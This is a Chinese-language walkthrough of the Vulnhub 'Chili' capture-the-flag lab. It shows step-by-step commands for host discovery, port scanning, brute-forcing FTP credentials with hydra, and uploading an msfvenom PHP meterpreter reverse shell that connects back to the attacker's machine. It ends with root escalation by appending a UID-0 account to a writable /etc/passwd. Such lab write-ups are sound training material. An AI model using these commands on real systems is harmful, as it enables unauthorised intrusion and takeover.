靶机渗透测试(Chili):
Vulnhub靶机 Chili
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Easy)
目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
渗透流程:
1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)
得到靶机ip地址为:192.168.10.88
2. nmap进行靶机端口服务扫描
nmap -sS -Pn -A -p- -n 192.168.10.88
可以扫描出靶机开放了21-ftp端口服务,80-http端口服务;
3. 根据端口服务进行渗透(80-http端口服务)
3.1. 目录爆破
首先御剑,dirb工具扫描一波目录,发现没有效果,于是ctrl+u查看网页源代码,可以敏感的看出一些信息:猜测可能ftp登陆后用户名为chili(靶机名称也为chili)
3.2. hydra爆破
进入kali,使用hydra九头蛇工具进行爆破!!
hydra -l chili -p 密码字典 ftp://192.168.10.88
爆破得到ftp服务登陆账号密码为chili / a1b2c3d4;
4. ftp登录(22端口服务)
ftp 192.168.10.88 直接在kali终端使用ftp登陆;
kali中若未安装ftp服务,可以自行安装:
下载FTP:
apt-get install ftp
ftp FTP服务器IP地址
或者:
apt-get install vsftpd
service vsftpd start 开启服务
service vsftpd status 查看状态
service vsftpd stop 停止服务
service vsftpd restart 重新启动服务
4.1. 切换目录
切换到网站目录:/var/www/html,发现可读可写可执行的.nano目录
4.2. 生成反弹shell脚本
使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=kali虚拟机ip LPORT=2345 R > shell.php,生成php反弹shell脚本;
使用pwd命令查看该shell.php脚本所在位置为/root目录下;
4.3. 赋予shell脚本执行权限
在ftp服务器中使用put命令,将shell.php上传到.nano目录中;
使用命令:chmod 777 shell.php,将shell.php赋予执行权限!!!
修改文件和文件夹所有者和所属组方法一样,如果要把文件夹内的文件的所有者和所属组都修改了,要加 -R 参数。chown除了可以修改属主属性,还可以修改所属组属性。
命令: chown 属主:属组 文件
4.4. 反弹shell
启动msf,使用payload为之前生成后门所用的payload,之后访问http://192.168.10.88/.nano/shell.php,顺利反弹shell;
5. 提权操作
passwd 文件有写入权限,我们可以自己写一个root权限的空密码账号,再用passwd写入密码来进行提权
使用命令:/usr/bin/perl -le ‘print crypt(“test”,“test”)’,这个命令为使用perl脚本语言,执行crypt模块,将test加密字符串输出;
使用命令:echo “test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash” >> /etc/passwd
在passwd文件中,写入test账户信息
使用命令:su test,输入密码test,成功提权为root权限;
实验总结:
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。
以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
提权操作: (利用 /etc/passwd 文件) 该实验中使用passwd文件可执行权限,给予普通用户root权限,设置普通用户UID,GID均为0;